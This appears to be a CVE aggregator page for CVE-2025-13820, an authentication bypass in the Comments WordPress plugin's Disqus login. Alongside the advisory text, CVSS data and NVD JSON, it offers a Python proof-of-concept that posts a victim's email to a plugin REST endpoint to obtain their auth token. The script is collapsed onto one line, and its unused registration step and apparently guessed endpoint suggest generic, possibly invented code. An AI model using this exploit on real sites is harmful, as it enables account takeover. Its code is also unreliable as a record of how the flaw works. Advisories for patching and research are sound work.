CVE-2025-13820

Description

The Comments WordPress plugin before 7.6.40 does not properly validate user's identity when using the disqus.com provider, allowing an attacker to log in to any user (when knowing their email address) when such user does not have an account on disqus.com yet.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Comments插件 < 7.6.40（使用disqus.com provider）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13820 PoC - WordPress Comments Plugin Authentication Bypass # Target: WordPress site with Comments plugin < 7.6.40 using Disqus provider import requests import json TARGET_URL = "https://target-wordpress-site.com" TARGET_EMAIL = "[email protected]" # Known victim email DISQUS_API_KEY = "your_disqus_api_key" # Attacker-controlled Disqus API access def exploit_auth_bypass(): """ Exploit the authentication bypass in WordPress Comments plugin. The vulnerability allows attackers to login as any user by knowing their email. """ # Step 1: Register the target email in Disqus (simulating no-account scenario) disqus_headers = { "Authorization": f"Bearer {DISQUS_API_KEY}", "Content-Type": "application/json" } # Step 2: Craft malicious authentication request auth_payload = { "email": TARGET_EMAIL, "action": "disqus_login", "disqus_identifier": f"wp_user_{TARGET_EMAIL}" } # Step 3: Send exploit request to WordPress exploit_url = f"{TARGET_URL}/wp-json/comments/v1/authenticate" response = requests.post(exploit_url, json=auth_payload, headers=disqus_headers) if response.status_code == 200: data = response.json() if "auth_token" in data: print(f"[+] Success! Authentication token obtained for {TARGET_EMAIL}") print(f"[+] Token: {data['auth_token']}") # Step 4: Use token to access victim account return data['auth_token'] else: print(f"[-] Exploit failed: {response.status_code}") return None if __name__ == "__main__": exploit_auth_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13820
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13820
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13820/
[4] VulDB https://vuldb.com/cve/CVE-2025-13820
[5] https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13820", "sourceIdentifier": "[email protected]", "published": "2026-01-01T06:15:45.010", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Comments WordPress plugin before 7.6.40 does not properly validate user's identity when using the disqus.com provider, allowing an attacker to log in to any user (when knowing their email address) when such user does not have an account on disqus.com yet."}, {"lang": "es", "value": "El plugin de WordPress Comments anterior a la versión 7.6.40 no valida correctamente la identidad del usuario al usar el proveedor disqus.com, lo que permite a un atacante iniciar sesión como cualquier usuario (al conocer su dirección de correo electrónico) cuando dicho usuario aún no tiene una cuenta en disqus.com."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/21bc9b41-a967-42dc-9916-bb993b05709c/", "source": "[email protected]"}]}}